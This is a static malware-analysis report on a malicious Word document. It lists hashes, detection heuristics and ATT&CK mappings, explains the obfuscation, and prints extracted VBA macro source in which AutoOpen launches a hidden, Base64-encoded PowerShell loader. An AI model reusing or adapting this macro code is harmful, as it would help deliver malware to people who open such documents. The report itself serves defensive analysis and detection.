Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c5cd209266bb3fa…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 85.8 KB
Created: 2018-06-11 10:07:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 574f34eb6d07329a97fea87d86396c4c
SHA-1: 89975ee015728c0946d7b3a6dd8ebba0ce4801ed
SHA-256: 7c5cd209266bb3fa915797d92806238343cdd159abc6a3c8a3320e2dcb7b8fb9
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA project. Autoopen() calls dpWzrtpPWcw(), whose only effective statement is a Shell() call; the surrounding CLng/CSng/Int assignments operate on undefined names and never touch the command string, so they are filler. The command is assembled at run time: Chr(LauWkaZnPDE + vbKeyP + jfJoFuYa) evaluates to "P" because the two unassigned names are Empty and vbKeyP is 80, the literal "owers" follows, and aSdZGwilRt() returns fragments that begin "HeLL " and "-e IAA...", so Shell() receives "PowersHeLL -e <Base64>" with a window style of 75997 - 75997 = 0 (vbHide, no visible console). The Base64 is a UTF-16LE PowerShell command; decoding the fragments visible in the preview gives " &((gET-VAriable '*mDR*').NAME[3,11,2]-JOiN'') (nEW-oBjeCT IO.cOMpREsSION.DeFLatEStReAM( [sYstem.iO.mEMorystreaM][COnvERt]::fROmbASe64STRiNG('...", i.e. the script spells "iex" out of the name of the $MaximumDriveCount preference variable and then inflates a Base64-encoded Deflate stream holding the remainder of the script (cut off where the preview is truncated). That layered loader is consistent with the ClamAV Doc.Downloader.Valyria classification: the document body contains no download URL (the only extracted URL is the DrawingML schema namespace found in any document with drawing content), so retrieval of the next stage happens inside the decoded PowerShell. Note that the OLE_LEGACY_WORDBASIC_AUTOEXEC text below is the heuristic's generic description; a VBA project was recovered for this sample, so that finding adds no execution surface beyond OLE_VBA_AUTOOPEN.

Heuristics (7)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Downloader.Valyria-6595163-0
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
    Document contains VBA macro code
  • [critical] OLE_VBA_SHELL: Shell() call in VBA
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
  • [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9043 bytes
SHA-256: 821a0de222b4e75263e0e426640b2de5b2183bea35e0f11319a5f719753916b1

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "nVZuRKEkI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dpWzrtpPWcw()
On Error Resume Next
NSUCOv = CLng(58240 * CSng(PpHTjr + ChrB(XqJZB + CInt(24368))))
VWAKK = Int(kdjoS)
LnMsk = oQmNp
WwACi = zmlwz
BElYrm = TBWjR
wZMMw = HjznMF
wcojbP = CLng(80216 * CSng(rfcQZ + ChrB(HWBAR + CInt(68408))))
jjnZpR = Int(QDQYTK)
diVvRb = HtkwXd
KwnuV = SwBGlz
wnODzO = drfEA
vZnDd = npFHd
dpWzrtpPWcw = nsMdjqaVjU + Shell(TtZrb + Chr(LauWkaZnPDE + vbKeyP + jfJoFuYa) + "owers" + aSdZGwilRt + TCzVDcLm + ZnIWtiWAI + OKNvz, 75997 - 75997)
zUVhcP = CLng(19231 * CSng(bzTij + ChrB(IQXTQi + CInt(89080))))
tsJwd = Int(JKsfl)
zuswP = uhjwF
WiKXS = rujkbc
ilqJQ = otGzN
aDAnN = vnAbzI
End Function
Sub Autoopen()
On Error Resume Next
sFoqqP = CLng(36067 * CSng(YkiDX + ChrB(sRPPf + CInt(92746))))
rjrGWC = Int(pWCmiW)
AzCQj = JBTVjp
CWlLT = oBWzj
MmaBi = VAqsRM
vAppPV = jldSl
dpWzrtpPWcw
SViXiC = CLng(35364 * CSng(WIizkc + ChrB(paKEY + CInt(23221))))
LzLGb = Int(obIHQ)
ZASTOO = DZsGpi
IrKTNM = uJiMXb
Hvzaj = COWHvq
IwTsVb = DwQptE
End Sub


Attribute VB_Name = "iqjHqnov"
Function aSdZGwilRt()
On Error Resume Next
qFXjVE = CLng(84543 * CSng(EkwFB + ChrB(NbQhP + CInt(23600))))
KLZzzG = Int(toLdpk)
sivkMn = DoOcYf
OVwDMw = twlWwD
QZVQQd = sUzDY
HWLVba = fSMZcn
LKzCD = "HeLL " + "-e IAA" + "mACgAK" + "ABnAEUAV" + "AAtAFYA" + "QQByAGkA" + "YQBiAGwAZ" + "QAgACcAKgBt" + "AEQAUgAqA" + "CcAKQAuAE4AQQ"
wjJNO = CLng(68791 * CSng(mPtLH + ChrB(dVBAA + CInt(76701))))
XWnQvX = Int(AzMvn)
PVJKjp = lVHRJT
MJRLZ = oqbwtS
WLoCzY = nHMqRK
OCPVGb = AqjAVw
ZKCpIVi = "BNAEUA" + "WwAz" + "AC" + "wAMQAxACwAMgBdA" + "C0" + "ASgBPAGkAT" + "gAnAC" + "cAKQAgACgAb" + "gBFAFcAL" + "QBv"
ZtMRRw = CLng(35941 * CSng(jFUlo + ChrB(EzauPp + CInt(49519))))
MbmqsV = Int(ICcZq)
OzZzM = oWJBVn
vsFFG = Oljli
GzEYCr = wXqwB
DJlRCZ = DiZcC
bLiVG = "AEIAagBlAEM" + "AVAAgAEk" + "ATwAuAGMATw" + "BNAHAAUgB" + "FAFMAc" + "wBJA" + "E8ATgAuA" + "EQAZQBGAEwAY" + "QB0AEUAUwB0AFIA" + "ZQBBAE0AKAA"
VQbbhN = CLng(89943 * CSng(GjjwH + ChrB(JppEu + CInt(7722))))
DzdUd = Int(NXbXc)
GVvWv = kGWza
SvPIO = UhwmSR
GDBhBi = HcBnN
tvKzn = YcCiw
AYMJDSwF = "gAFsAcw" + "BZAHMAdABlAG0AL" + "gBpAE" + "8ALgBtAE" + "UATQBvAHI" + "Ae" + "QBzAH" + "QAcgBlAGEATQ"
JmCuW = CLng(37403 * CSng(iYoFi + ChrB(VSOtq + CInt(89883))))
uvvZXB = Int(MsVEVF)
rsJMFh = jtEqbX
oKiLn = KNqdX
UqlDj = cwdZEh
NrKBqi = djYimt
KivTIsSWQp = "BdAF" + "sAQwBPAG4AdgBFA" + "FIA" + "dABdADoAOgBmAFI" + "ATwBtAGIAQQB" + "TAGUANgA0AFMAV" + "ABS" + "AGkATgB" + "HACgAJwB"
lRdBjo = CLng(69479 * CSng(twqUG + ChrB(boOFBb + CInt(50383))))
ALAucs = Int(SCQqBq)
zXYsAA = LLVcwC
JdlRIJ = RBlMs
bvZiE = worjI
aioAiS = pwIZiZ
ImUwVpE = "aAF" + "oAQgB2A" + "GEAdwBJAHgARABN" + "AGEALwBTAGwA" + "OABVA"
hNhVmj = CLng(16031 * CSng(WQlrXn + ChrB(CSzdq + CInt(65601))))
cRWTjC = Int(SWuFLb)
GVtcSw = YOnvs
tqcBiL = lQzSz
zEtqm = MXvzD
YjXEC = YoRhbu
zwFQHksD = "DcA" + "bwA1AHAAUg" + "BSAG0ARABXAFEAY" + "QBDADcAZwA4A" + "GIAagBzAEY" + "AdABpAEcATQB"
WAZwqW = CLng(51982 * CSng(MwCiYB + ChrB(jMwsYA + CInt(19428))))
ihNPuL = Int(SczzPL)
aFbcYL = UZiipI
jjVsM = uPcGj
YjZfa = XtlsRw
wqJHjh = Diitd
bbjrVc = "3AG" + "EAcwA" + "xADUAYwBYAGQAdA" + "BiAGEAUABuAE" + "oAbgA3ADMAZ" + "ABWAE4AZgBqAEw" + "AMABKAEo" + "AUABrA"
CmrLc = CLng(40523 * CSng(HnEvuD + ChrB(ROTqRY + CInt(32987))))
ilHtY = Int(OpwfCW)
lBaQwB = KlONj
noPrbE = oEGDjw
twGPr = MjMtaV
wDzWt = noZaG
lrVuAQzwjwA = "GwAegA1AE4AdwBI" + "AFIAeQB1AE" + "cAbgBiA" + "EYARABEAFIAdABP" + "ADEAdQB" + "DAEoAdQBh" + "AFYAbQBk" + "AHQAYQA4A" + "HUARgA5AEcARQAv"
aSdZGwilRt = LKzCD + ZKCpIVi + bLiVG + AYMJDSwF + KivTIsSWQp + ImUwVpE + zwFQHksD + bbjrVc + lrVuAQzwjwA
End Function
Function TCzVDcLm()
On Error Resume Next
zjuhv = CLng(43196 * CSng(zibMiz + ChrB(zYHbV + CInt(33558))))
hqkHj = Int(WJfTY)
K
... (truncated)